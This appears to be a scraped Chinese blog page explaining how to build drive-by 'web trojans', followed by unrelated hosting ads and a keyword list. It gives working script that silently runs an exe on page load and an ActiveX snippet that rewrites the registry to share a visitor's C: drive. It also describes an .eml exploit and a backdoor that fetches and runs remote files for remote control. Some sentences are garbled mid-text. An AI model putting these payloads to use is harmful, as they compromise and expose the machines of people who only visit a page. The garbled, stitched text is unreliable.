网页木马生成器制造者是怎样制造网络木马的

网页木马生成器  时间:2021-07-29  阅读:()

制造者是怎样制造网络木马的

制作网页木马原理 大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。

1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下: <script language="javascript"> run_exe="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject"" run_exe+="CODEBASE="test.exe#version=1,1,1,1">" run_exe+="<PARAM NAME="_Version" value="65536">" run_exe+="</OBJECT>" run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>"; document.open(); document.clear(); document.writeln(run_exe); document.close(); </script> 再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。

2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下: script language=javascript> document.write("<APPLET HEIGHT=0 WIDTH=0 .ms.activeX.ActiveXComponent></APPLET>"); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Path","C:\"); } function init() { setTimeout("f()", 1000); } init(); </script> 当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:连接目标地址里...褪枪蚕砹恿恕?/a> 这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。

3.也是现在最好用的一种了吧,个人认为。

它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址实际上就是一个转...憧梢酝ü齮 x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。

这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦 好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处

racknerd:美国大硬盘服务器,$599/月,Ryzen7-3700X/32G内存/120gSSD+192T hdd

racknerd当前对美国犹他州数据中心的大硬盘服务器(存储服务器)进行低价促销,价格跌破眼镜啊。提供AMD和Intel两个选择,默认32G内存,120G SSD系统盘,12个16T HDD做数据盘,接入1Gbps带宽,每个月默认给100T流量,5个IPv4... 官方网站:https://www.racknerd.com 加密数字货币、信用卡、PayPal、支付宝、银联(卡),可以付款! ...

Vultr VPS韩国首尔机房速度和综合性能参数测试

Vultr 商家有新增韩国首尔机房,这个是继日本、新加坡之后的第三个亚洲机房。不过可以大概率知道肯定不是直连中国机房的,因为早期的日本机房有过直连后来取消的。今天准备体验看看VULTR VPS主机商的韩国首尔机房的云服务器的速度和性能。1、全球节点PING速度测试这里先通过PING测试工具看看全球几十个节点的PING速度。看到好像移动速度还不错。2、路由去程测试测试看看VULTR韩国首尔机房的节点...

HTTPS加密协议端口默认是多少且是否支持更换端口访问

看到群里网友们在讨论由于不清楚的原因,有同学的网站无法访问。他的网站是没有用HTTPS的,直接访问他的HTTP是无法访问的,通过PING测试可以看到解析地址已经比较乱,应该是所谓的DNS污染。其中有网友提到采用HTTPS加密证书试试。因为HTTP和HTTPS走的不是一个端口,之前有网友这样测试过是可以缓解这样的问题。这样通过将网站绑定设置HTTPS之后,是可以打开的,看来网站的80端口出现问题,而...

网页木马生成器为你推荐
word2003公式编辑器w2003的公式编辑器在那网龙吧网龙计算机科技 怎么样?怎么没听过这个公司啊?了解的朋友请帮忙回答下 谢谢常用软件开发工具java编程常用的软件有哪些常用软件开发工具常用设计软件都有哪些?发博客怎么发博客?淘气鸟乌儿很淘气,飞来飞去,蹦蹦跳跳,请你用“一会儿…一会儿…一会儿…”写写鸟儿?linux操作系统好吗linux好用不?慕课网址慕课网是什么?handoff怎么用Mac OS Yosemite Handoff,iOS8 Handoff怎么用双色球在线选号器求一款6120c双色球选号软件
虚拟主机评测 安徽双线服务器租用 域名备案号查询 如何申请免费域名 怎么申请域名 美国主机评测 technetcal fastdomain 便宜建站 国外bt 好看的留言 12306抢票助手 搜狗12306抢票助手 湖南服务器托管 免费个人空间申请 idc资讯 hinet 亚马逊香港官网 美国在线代理服务器 息壤代理 更多